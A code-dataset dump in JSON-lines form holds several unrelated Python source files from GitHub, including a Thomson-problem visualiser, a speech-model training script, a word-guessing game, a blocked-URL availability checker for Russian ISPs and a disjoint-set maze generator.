my_client.get_stream_by_id(stream_id)\n","repo_name":"streamr-dev/streamr-client-python","sub_path":"examples/createOrGetStream.py","file_name":"createOrGetStream.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"16992563670","text":"import matplotlib\nmatplotlib.use('QtAgg')\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\nfrom scipy.optimize import dual_annealing\n\ndef polar_to_cartesian(m):\n return np.array([\n np.sin(m[0]) * np.cos(m[1]),\n np.sin(m[0]) * np.sin(m[1]),\n np.cos(m[0])\n ])\n\ndef filter_indexes(x):\n return np.any(x[0] < x[1])\n\n\nclass Thomson(object):\n def __init__(self) -> None:\n self.nb_call = 0\n self.best_value = np.inf\n\n def objective(self, x):\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n\n def rdist_fun(x):\n return np.array(\n 1 / np.sqrt(np.sum(\n (y_mat[x[0]] - y_mat[x[1]])** 2))\n )\n\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n seq_vec = np.arange(0, x_mat.shape[0])\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n rdist = np.apply_along_axis(rdist_fun, axis=1, arr=indexes)\n fvalue = np.sum(rdist)\n if fvalue < self.best_value:\n self.best_value = fvalue\n update_plot(x, fvalue, self.nb_call, self.best_value, better=True)\n else:\n update_plot(x, fvalue, self.nb_call, self.best_value, better=False)\n self.nb_call +=1 \n return fvalue\n\n\nn_particles = 12\nlw = np.array([0] * (n_particles * 2))\nup = np.concatenate((\n np.repeat(np.pi, n_particles),\n np.repeat(2 * np.pi, n_particles)), axis=None)\nbounds=list(zip(lw, up))\n\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\n\nu, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:20j]\nx = np.cos(u)*np.sin(v)\ny = np.sin(u)*np.sin(v)\nz = np.cos(v)\n\ndef init_sphere():\n ax.plot_wireframe(x, y, z, color=\"grey\", linewidth=0.2)\n ax.plot_surface(x, y, z, color=\"g\", alpha=0.1)\n return fig,\n\ndef update_plot(x, f, nb_call, best_value, better):\n ax.view_init(elev=20, azim=nb_call % 360 )\n ax.set_title(f'Nb function call: {nb_call} Energy: {best_value:.6f}')\n if better:\n plt.cla()\n init_sphere()\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n for i in range(n_particles):\n ax.scatter(y_mat[i, 0], y_mat[i, 1], y_mat[i, 2])\n seq_vec = np.arange(0, n_particles)\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n for i in range(indexes.shape[0]):\n ax.plot(\n [\n y_mat[indexes[i, 0], 0],\n y_mat[indexes[i, 1], 0],\n ],\n [\n y_mat[indexes[i, 0], 1],\n y_mat[indexes[i, 1], 1],\n ],\n [\n y_mat[indexes[i, 0], 2],\n y_mat[indexes[i, 1], 2],\n ], linewidth=0.9,\n )\n\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nplt.ion()\ninit_sphere()\nax.view_init(elev=20, azim=(90))\nthomson = Thomson()\nres = dual_annealing(thomson.objective, bounds=bounds)\n\n\n","repo_name":"sgubianpm/pyconie2022","sub_path":"thomson.py","file_name":"thomson.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72056921962","text":"import momo\nimport numpy as np\nfrom math import *\nfrom __common__ import *\n\ndef max_idx( value, reference ):\n cur_idx = -1\n for i in xrange( len( reference ) ):\n if value >= reference[i]:\n cur_idx = i\n return cur_idx\n \n\ndef compute_feature( reference, frame, radius = 3 ):\n feature = np.array( [0.] * FEATURE_LENGTH, dtype = np.float32 )\n\n for i in xrange( len( frame ) ):\n rel_x = frame[i][:2] - reference[:2]\n l_x = np.linalg.norm( rel_x )\n\n n = rel_x / l_x\n e = frame[i][:2] / np.linalg.norm( frame[i][:2] )\n cos_phi = np.dot( -n, e )\n force = ( LAMBDA + 0.5 * ( 1 - LAMBDA ) * ( 1 + cos_phi ) ) * exp( 2 * radius - l_x ) \n i = max_idx( force, ANGLES )\n if force > 0.5:\n feature[max( i, 0 )] += 1\n return feature\n\n\n\n","repo_name":"dichodaemon/momo","sub_path":"python/momo/features/helbing/compute_feature.py","file_name":"compute_feature.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26878956407","text":"#!/usr/bin/env python3\n\nimport os\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\nimport argparse\nimport yaml\nimport random\nimport numpy as np\nimport logging\nfrom waterfall import models\nfrom waterfall.utils import datapipe, datapipe_manual_ctc, datapipe_k2\nfrom waterfall.manual_ctc import eta_scheduler\nimport wandb\n\n\ndef main(args):\n cfg = yaml.load(open(args.config), Loader=yaml.loader.SafeLoader)\n pl.seed_everything(cfg['seed'], workers=True)\n\n batch_size = cfg['batch_size'] if args.batch_size == 0 else args.batch_size\n\n if cfg['loss'] == 'ctc':\n Dataset = datapipe.Dataset\n collate_fn = datapipe.collate_fn\n elif cfg['loss'] in ['ctc_fb', 'ctc_softmax']:\n Dataset = datapipe_manual_ctc.Dataset\n collate_fn = datapipe_manual_ctc.collate_fn\n elif cfg['loss'] in ['ctc_k2', 'k2']:\n Dataset = datapipe_k2.Dataset\n collate_fn = datapipe_k2.collate_fn_sorted\n\n if cfg['loss'] in ['ctc_k2', 'k2']:\n train_data = Dataset(args.train_set,\n args.lang_dir, token_type='phones')\n dev_data = Dataset(args.dev_set,\n args.lang_dir, token_type='phones')\n else:\n train_data = Dataset(args.train_set,\n args.lang_dir)\n dev_data = Dataset(args.dev_set,\n args.lang_dir)\n\n train_gen = DataLoader(train_data,\n batch_size=batch_size,\n shuffle=True,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n dev_gen = DataLoader(dev_data,\n batch_size=batch_size,\n shuffle=False,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n\n model = models.Wav2VecFineTuningDiverse(\n train_data.lang.num_nn_output, cfg=cfg, lang_dir=args.lang_dir)\n\n os.makedirs('exp/%s' % (args.name), exist_ok=True)\n model_checkpoint= pl.callbacks.ModelCheckpoint(monitor='valid_loss',\n save_top_k=1 if 'save_top_k' not in cfg.keys(\n ) else cfg['save_top_k'],\n every_n_epochs=1,\n filename='{epoch}-{valid_loss:.3f}',\n mode='min')\n callbacks = [model_checkpoint,\n pl.callbacks.LearningRateMonitor(logging_interval='step'),\n pl.callbacks.RichProgressBar(),\n pl.callbacks.RichModelSummary(max_depth=2)]\n\n if cfg['early_stopping']:\n callbacks.append(pl.callbacks.EarlyStopping(monitor='valid_loss',\n mode='min',\n patience=cfg['patience'],\n verbose=True))\n\n if 'auto_eta_scheduler' in cfg.keys() and cfg['auto_eta_scheduler']:\n callbacks.append(eta_scheduler.AutoEtaScheduler('valid_loss',\n delta_eta=cfg['delta_eta'],\n final_eta=cfg['final_eta'],\n patience=cfg['patience_eta'],\n verbose=True))\n\n accumulate_grad_batches = 1 # by default 1, args.accumulate_grad_batches has more priority than cfg['accumulate_grad_batches']\n if args.accumulate_grad_batches != 1:\n accumulate_grad_batches = args.accumulate_grad_batches\n elif 'accumulate_grad_batches' in cfg.keys():\n accumulate_grad_batches = cfg['accumulate_grad_batches']\n\n logger = pl.loggers.WandbLogger(\n project=args.name, save_dir='exp/%s' % (args.name))\n logger.watch(model, log='all')\n\n if args.checkpoint:\n if not args.load_weights_only:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n resume_from_checkpoint=args.checkpoint,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n model.load_state_dict(torch.load(args.checkpoint)['state_dict'])\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n\n trainer.fit(model, train_gen, dev_gen)\n\n logger.log_metrics({'best_model_path': os.path.join(os.getcwd(), model_checkpoint.best_model_path),\n 'best_model_loss': model_checkpoint.best_model_score.item()})\n wandb.finish()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--train_set', help='Training set directory.', type=str)\n parser.add_argument('--dev_set', help='Dev set directory.', type=str)\n parser.add_argument('--lang_dir', help='Lang directory.', type=str)\n parser.add_argument('--config', help='Configuration file path.', type=str)\n parser.add_argument(\n '--name', help='Experiment name. Models will be stored in exp/$name/version*', type=str, default='ctc')\n parser.add_argument(\n '--gpus', help='Number of GPUs that used for training.', type=int, default=1)\n parser.add_argument(\n '--checkpoint', help='Resume from checkpoint.', type=str, default=None)\n parser.add_argument('--load_weights_only',\n help='Whether or not load weights only from checkpoint.', type=bool, default=False)\n parser.add_argument('--batch_size', help='The batch_size for training.', type=int, default=0)\n parser.add_argument(\n '--accumulate_grad_batches', help='The number of batches for gradient accumulation.', type=int, default=1)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"ZhaoZeyu1995/Waterfall","sub_path":"waterfall/bin/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"13416865029","text":"# Imports the Google Cloud client library\nfrom google.cloud import translate\n\n# Instantiates a client\ntranslate_client = translate.Client()\n\ndef translate (text,target):\n\n translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n return translation['translatedText']\n\n# The text to translate\n# text = u'です by Glamour'\n# The target language\n# target = 'pt'\n\n# Translates some text into Russian\n# translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n\n#translate_client.get\n\n# print(u'Text: {}'.format(text))\n# print(u'Translation: {}'.format(translation['translatedText']))\n","repo_name":"rovanemoura/DESU-by-Glamour","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38563579519","text":"# Kelime Tahmin Oyunu\n# Önce rastgele bir kelime seçilecek (Bu bir fonksiyon olsun. Bir listenin içinden rastgele bir kelime seçip versin)\n# Kaç haklı oynamak istediğini oyuncuya soracak. 1 ile 25 arasında bir sayı seçmesi sağlanacak. Buna HakSayısı diyelim.\n# Rastgele seçilen Kelimenin harf sayısı kadar ekrana ****** basılacak.\n# ve Oyuncuya \"Tahminini gir\" diyecek. Bir harf girmek dışındaki girişlerde \"hatalı giriş yaptın\" diyecek.\n# Girilen harf, kelienin içinde varsa onu görünür yapacak. \"Tebrikler bir harf bildin. Kelime = ****A** \" gibi bir mesaj vrecek\n# Harf hatalı ise hakSayısından düşecek. Hak sayısı sıfır olunca \"KAYBETTİN\" mesajıyla oyun bitecek.\n# Tahmin hakları bitmeden kelimeyi bilirse \"TEBRİKLER KAZANDIN\" mesajı ile oyun bitecek.\n# kulanılacak kütüphane random\n# mesela 1 ile 20 arasında rastgele bir sayı üretecek fonksiyon : randint(0,19)\n#\n# Her seferinde ekrana yıldızlı yazdırmak için ipucu :\n# Tahmin girildiğinde, eğer girilen harf kelimenin içinde varsa bu harfi bulunanlar adlı bir diziye atarız\n# kelimenin eleman sayısını len() ile buluruz.\n# Bir döngüde her bir harf için şunu yaparız; bu harf bulunanlar dizisinde varsa harfin kendisini yazarız, yoksa * yazarız.\n# En sonunda,\nimport random\n\n#rastgele bir kelime bulma fonksiyonu\ndef KelimeSec():\n kelimeler = ['masa','kalemkutu','makas','ev','koyun','armut','kiraz','dolap','balina', \"berat\"]\n sayı = random.randint(0,len(kelimeler)-1)\n secim = kelimeler[sayı].lower()\n return secim\n\n\n\n#tahmin edilecek kelimeyi yıldızlar halinde yazar. Bulunan harfleri yerlerine yerleştirir.\ndef EkranaYaz(kelime,liste):\n yazılacak = \"\"\n for harf in kelime:\n if (harf in liste):\n yazılacak = yazılacak + harf\n else:\n yazılacak = yazılacak + \"*\"\n\n print(\"KELİME = \"+yazılacak)\n\n return yazılacak\n\n#giriş ekranını gösteren fonksiyon\ndef GirisEkranı():\n print(\"-----KELİME TAHMİN OYUNUNA-----\"\"\\n\"\n \"-----------HOŞGELDİNİZ---------\"\"\\n\"\n \"-------------------------------\"\"\\n\")\n\n# burada, kullanıcı doğru bir seçim girene kadar soruluyor\ndef OyunHakSayısı():\n hak = 0\n while True:\n try:\n hak = int(input(\"Kaç haklı oynamak istersiniz.\"))\n except:\n print(\"Hatalı giriş yaptınız\")\n continue\n if (hak > 25 or hak < 0):\n print(\"HATALI SEÇİM (1 ile 25 arasında seçim yapın) \")\n continue\n else:\n break\n return hak\n\n\n\n# Programın ana bölümü\n\nGirisEkranı()\n\nkelime = KelimeSec()\n\nuzunluk = len(kelime)\n\nbulunan_harfler = []\n\noyunhakkı = OyunHakSayısı()\n\nprint(\"*\" * uzunluk)\n\nwhile True:\n\n harf = input(\"Harf tahmin edin\")\n harf = harf.lower()\n if(harf in kelime):\n if(harf not in bulunan_harfler):\n bulunan_harfler.append(harf)\n else:\n oyunhakkı = oyunhakkı - 1\n print(\"{} hakkınız kaldı. \".format(oyunhakkı))\n\n if (oyunhakkı == 0):\n print(\"Oyunu kaybettin\")\n quit()\n\n ekranaYazılan = EkranaYaz(kelime,bulunan_harfler)\n\n# eğer tüm harfler bulundu ise kazandın deyip oyunu bitirsin\n if(kelime == ekranaYazılan):\n print(\"Oyunu kazandınız TEBRİKLER\")\n quit()\n\n\n\n\n","repo_name":"hasanlacin/Berat-Projeler","sub_path":"Kelime Tahmin Oyunu.py","file_name":"Kelime Tahmin Oyunu.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4216976168","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\ndef algorithm(number1, number2):\n m = number1\n n = number2\n start = True\n while(start):\n t = m // n\n r = m - n * t\n if r == 0:\n print(\"Наибольшим числителем для {} и {} есть {}\".format(number1, number2 , n))\n start = False\n else:\n m = n\n n = r\n\n","repo_name":"MaxAlekseevDev/Algorithms","sub_path":"Euclid_algorithm.py","file_name":"Euclid_algorithm.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24237968283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom enum import Enum, unique\nimport urllib.request\n\n\n@unique\nclass Category(Enum):\n Android = '5562b410e4b00c57d9b94a92' # 安卓\n Frontend = '5562b415e4b00c57d9b94ac8' # 前端\n IOS = '5562b405e4b00c57d9b94a41' # iOS\n Backend = '5562b419e4b00c57d9b94ae2' # 后端\n Design = '5562b41de4b00c57d9b94b0f' # 设计\n Product = '569cbe0460b23e90721dff38' # 产品\n Freebie = '5562b422e4b00c57d9b94b53' # 工具资源\n Article = '5562b428e4b00c57d9b94b9d' # 阅读\n AI = '57be7c18128fe1005fa902de' # 人工智能\n All = 'all'\n\n\nARTICLETYPE = {\n 'hot': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_rank',\n 'new': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_timeline',\n}\n\n\ndef get_juejin(limit=20, category=Category.All, article_type='hot', src='sixgold'):\n if article_type == 'hot':\n url = ARTICLETYPE['hot']\n else:\n url = ARTICLETYPE['new']\n\n req_url = '%s?src=%s&limit=%s&category=%s' % (url, src, limit, category.value)\n\n def make_request():\n with urllib.request.urlopen(req_url) as f:\n yield f.read()\n\n yield from make_request()\n\nif __name__ == '__main__':\n for i in get_juejin(limit=5, category=Category.AI, article_type='new', src='sixgold'):\n print(i.decode('utf-8'))\n print(\"\\n\")","repo_name":"kobelover/juejin","sub_path":"juejin.py","file_name":"juejin.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42002494260","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Импорты Python\nimport time, sys, threading, signal, ipaddress, gc, configparser, sqlite3, os\n\n# Сторонние пакеты\nimport requests\n\n# Наш конфигурационный файл\nconfig = configparser.ConfigParser()\nconfig.read('/etc/roskom/tools.ini')\n\n# База данных\ndb = sqlite3.connect(config['roskomtools']['database'])\n\n# Создадим таблицы результатов проверок\ncursor = db.cursor()\ncursor.execute(\"CREATE TABLE IF NOT EXISTS checks (check_id INTEGER PRIMARY KEY AUTOINCREMENT, check_when INTEGER, check_total INTEGER, check_available INTEGER, check_minutes INTEGER, check_seconds INTEGER, check_maxrss INTEGER)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS available_links (link_check_id INTEGER, link_when INTEGER, link_url TEXT)\")\ncursor.close()\ndb.commit()\n\n# Общи�� модули\nsys.path.append('/usr/share/roskomtools')\nimport rknparser\n\n# Время начала работы скрипта\nexecution_start = time.time()\n\n# Расставим затычки-мьютексы\nin_mutex = threading.Lock()\nout_mutex = threading.Lock()\n\n# Прикинемся браузером\nrequest_headers = {\n\t'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108 Safari/537.36',\n}\n\n# Текст для поиска в ответе\nsearch_text = config['check']['search_text'].encode('utf-8')\n\n# Счётчик обработанных ссылок (для отображения прогресса)\ncounter = 0\n\n# Наш воркер\nclass Worker(threading.Thread):\n\tdef __init__(self, thread_id, in_data, out_data, trace):\n\t\tthreading.Thread.__init__(self),\n\t\tself.thread_id = thread_id\n\t\tself.in_data = in_data\n\t\tself.out_data = out_data\n\t\tself.timeout = 3\n\t\tself.iter_count = 0\n\t\tself.total_count = len(in_data)\n\t\tself.trace = trace\n\n\tdef select_unprocessed(self):\n\t\twith in_mutex:\n\t\t\ttry:\n\t\t\t\tresult = self.in_data.pop()\n\t\t\texcept:\n\t\t\t\tresult = None\n\t\t\treturn result\n\n\tdef report_progress(self, item):\n\t\tglobal counter\n\t\tcounter += 1\n\t\tprint(u\"(%d of %d) [%s] %s\" % (counter, self.total_count, item['status'], item['url']))\n\n\tdef process_item(self, item):\n\t\tglobal request_headers, search_text\n\t\titem['checked'] = int(time.time())\n\n\t\ttry:\n\t\t\tresponse = requests.get(item['url'], timeout = self.timeout, stream = True, headers = request_headers)\n\t\t\tcontent = response.raw.read(10000, decode_content = True)\n\n\t\t\tif search_text in content:\n\t\t\t\titem['status'] = 'blocked'\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tpeer = response.raw._connection.sock.getpeername()\n\t\t\t\texcept:\n\t\t\t\t\titem['status'] = 'available'\n\t\t\t\telse:\n\t\t\t\t\tif peer is not None:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\taddress = ipaddress.ip_address(peer[0])\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\titem['status'] = 'available' # ???\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif address.is_private:\n\t\t\t\t\t\t\t\titem['status'] = 'local-ip'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\titem['status'] = 'available'\n\t\t\t\t\telse:\n\t\t\t\t\t\titem['status'] = 'available'\n\t\texcept Exception as e:\n\t\t\titem['status'] = 'failure'\n\n\t\twith out_mutex:\n\t\t\tif self.trace:\n\t\t\t\tself.report_progress(item)\n\t\t\tself.out_data.append(item)\n\n\t\tself.iter_count += 1\n\t\tif (self.iter_count % 100) == 0:\n\t\t\tgc.collect()\n\n\tdef set_timeout(self, new_timeout):\n\t\tself.timeout = new_timeout\n\n\tdef run(self):\n\t\twhile True:\n\t\t\titem = self.select_unprocessed()\n\t\t\tif item is None:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself.process_item(item)\n\n# Профилирование\nimport resource\n\ndef signal_handler(signal, frame):\n\tprint(\"Aborted by signal, exitting.\")\n\texit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGQUIT, signal_handler)\n\nprint(\"Starting using %d threads\" % (int(config['check']['threads']),))\n\ntry:\n\tprint(\"Loading data...\")\n\tin_data = rknparser.load_urls(db)\n\tout_data = []\nexcept:\n\tprint(\"Failed to load data. Run rkn-load.py to load the registry and rkn-parse.py to parse it.\")\n\texit(-1)\n\nprint(\"Loading succeeded, starting check\")\n\n# Инициализируем наши рабочие потоки\nthreads = {}\nfor i in range(int(config['check']['threads'])):\n\tthreads[i] = Worker(i, in_data, out_data, True)\n\tthreads[i].set_timeout(int(config['check']['http_timeout']))\n\tthreads[i].setDaemon(True)\n\n# Разветвляемся\nfor index, thread in threads.items():\n\tthread.start()\n\n# Соединяемся\nfor index, thread in threads.items():\n\tthread.join()\n\n# На этом этапе у нас сформирована статистика в массиве out_data, получим данные для внесения в БД\ntimestamp = int(time.time())\ntotal_count = len(out_data)\navailable = [i for i in out_data if i['status'] == 'available']\n#unavailable = [i for i in out_data if i['status'] in ['blocked', 'failure', 'local-ip']]\navailable_count = len(available)\n\n# Предварительная оценка ресурсов для записи в лог\nstat = resource.getrusage(resource.RUSAGE_SELF)\n\n# Время окончания работы скрипта\nexecution_end = time.time()\nexecution_time = execution_end - execution_start\nexecution_minutes = int(execution_time / 60)\nexecution_seconds = (execution_time - (execution_minutes * 60))\n\n# Сохраним результат в БД\ncursor = db.cursor()\ndata = (timestamp, total_count, available_count, execution_minutes, execution_seconds, stat.ru_maxrss)\ncursor.execute(\"INSERT INTO checks (check_when, check_total, check_available, check_minutes, check_seconds, check_maxrss) VALUES (?, ?, ?, ?, ?, ?)\", data)\ncheck_id = cursor.lastrowid\nfor link in available:\n\tdata = (check_id, link['checked'], link['url'])\n\tcursor.execute(\"INSERT INTO available_links (link_check_id, link_when, link_url) VALUES (?, ?, ?)\", data)\ncursor.close()\ndb.commit()\n\nif os.isatty(sys.stdin.fileno()):\n\twith open('result.txt', 'w') as f:\n\t\tfor link in available:\n\t\t\tf.write(\"%s <%d>\\n\" % (link['url'], link['checked']))\n\n\tprint(\"---\\nCheck finished in %dm:%.2fs using %d kb RES\\nAvailable: %d, not available: %d\" % (execution_minutes, execution_seconds, stat.ru_maxrss, available_count, total_count - available_count))\n","repo_name":"orgtechservice/roskomtools","sub_path":"rkn-check/usr/bin/rkn-check.py","file_name":"rkn-check.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"33333794403","text":"\"\"\"\n问题描述:给定一个double类型的数组arr,其中的元素可正、可负、可0,返回子数组累乘的最大\n乘积。\n\n例如:\narr=[-2.5,4,0,3,0.5,8,-1],子数组[3,0.5,8]累乘可以获得最大的乘积12,所以返回12.\n\"\"\"\n\n\nclass SubArrMaxSum:\n @classmethod\n def get_max_sum(cls, arr):\n if not arr:\n return\n\n if len(arr) == 1:\n return arr[0]\n\n pre_max = arr[0]\n pre_min = arr[0]\n res = arr[0]\n\n for i in range(1, len(arr)):\n end_max = pre_max * arr[i]\n end_min = pre_min * arr[i]\n\n pre_max = max([arr[i], end_max, end_min])\n pre_min = min([arr[i], end_max, end_min])\n\n res = max([res, pre_max])\n\n return res\n\n\nif __name__ == '__main__':\n my_arr = [-2.5, 4, 0, 3, 0.5, 8, -1]\n print(SubArrMaxSum.get_max_sum(my_arr))\n","repo_name":"ResolveWang/algorithm_qa","sub_path":"arrandmatrix/q19.py","file_name":"q19.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"zh","doc_type":"code","stars":86,"dataset":"github-code","pt":"19"} +{"seq_id":"43465308279","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 14:57:48 2019\r\n\r\n@author: Yahir F. Rivas\r\n\"\"\"\r\n\r\n# Starting point for program to build and draw a maze\r\n# Modify program using disjoint set forest to ensure there is exactly one\r\n# simple path joiniung any two cells\r\n# Programmed by Olac Fuentes\r\n# Last modified March 28, 2019\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\nimport time\r\n\r\ndef draw_maze(walls,maze_rows,maze_cols,cell_nums=False):\r\n fig, ax = plt.subplots()\r\n for w in walls:\r\n if w[1]-w[0] ==1: #vertical wall\r\n x0 = (w[1]%maze_cols)\r\n x1 = x0\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0+1\r\n else:#horizontal wall\r\n x0 = (w[0]%maze_cols)\r\n x1 = x0+1\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0 \r\n ax.plot([x0,x1],[y0,y1],linewidth=1,color='k')\r\n sx = maze_cols\r\n sy = maze_rows\r\n ax.plot([0,0,sx,sx,0],[0,sy,sy,0,0],linewidth=2,color='k')\r\n if cell_nums:\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols \r\n ax.text((c+.5),(r+.5), str(cell), size=10,\r\n ha=\"center\", va=\"center\")\r\n ax.axis('off') \r\n ax.set_aspect(1.0)\r\n\r\ndef wall_list(maze_rows, maze_cols):\r\n # Creates a list with all the walls in the maze\r\n w =[]\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols\r\n if c!=maze_cols-1:\r\n w.append([cell,cell+1])\r\n if r!=maze_rows-1:\r\n w.append([cell,cell+maze_cols])\r\n return w\r\n\r\ndef find(S,i):\r\n # Returns root of tree that i belongs to\r\n if S[i]<0:\r\n return i\r\n return find(S,S[i])\r\n\r\ndef find_c(S,i): #Find with path compression \r\n if S[i]<0: \r\n return i\r\n r = find_c(S,S[i]) \r\n S[i] = r \r\n return r\r\n\r\nplt.close(\"all\") \r\nmaze_rows = 10\r\nmaze_cols = 15\r\n\r\n\r\ndef DisjointSetForest(size):\r\n return np.zeros(size,dtype=np.int)-1 \r\n\r\ndef numSets(S): #return the number of sets\r\n count = 0\r\n for i in S:\r\n if i < 0: #if it is -1 then it is a root so add 1\r\n count += 1\r\n return count\r\n\r\ndef union(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n ri = find(S,i) \r\n rj = find(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\ndef union_c(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nplt.close(\"all\")\r\n\r\ndef countSets(S):\r\n\tc = 0\r\n\tfor i in S:\r\n\t\tif i==-1:\r\n\t\t\tc+=1\r\n\treturn c \r\n\r\ndef unionSize(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj: #if different root\r\n if S[ri] > S[rj]: #if ri is bigger than rj then rj goes to ri\r\n S[rj] += S[ri]\r\n S[ri] = rj\r\n return True\r\n else:\r\n S[ri] += S[rj] #if rj is bigger than ri then ri goes to rj\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nmaze_rows = 10\r\nmaze_cols = 15 \r\nwalls = wall_list(maze_rows,maze_cols)\r\n\r\ndraw_maze(walls,maze_rows,maze_cols,cell_nums=True) \r\n\r\nS = DisjointSetForest(maze_rows*maze_cols)#use a dsf to create maze\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1: \r\n d = random.randint(0,len(walls)-1)\r\n if union(S,walls[d][0],walls[d][1]): #if they are in different sets\r\n walls.pop(d) #remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for standard union is: \", rt ) \r\n\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1:\r\n d = random.randint(0,len(walls)-1)\r\n if union_c(S,walls[d][0],walls[d][1]):#if they are in different sets\r\n walls.pop(d)#remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for compression is: \", rt ) \r\n \r\n \r\n'''\r\nfor i in range(len(walls)//2): #Remove 1/2 of the walls \r\n d = random.randint(0,len(walls)-1)\r\n print('removing wall ',walls[d])\r\n walls.pop(d)\r\n'''\r\nplt.close(\"all\")\r\n\r\ndraw_maze(walls,maze_rows,maze_cols) \r\n","repo_name":"yfrivas/CS2302","sub_path":"Lab6.py","file_name":"Lab6.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3418914962","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport openood.utils.comm as comm\nfrom openood.losses import soft_cross_entropy\nfrom openood.utils import Config\n\nfrom .lr_scheduler import 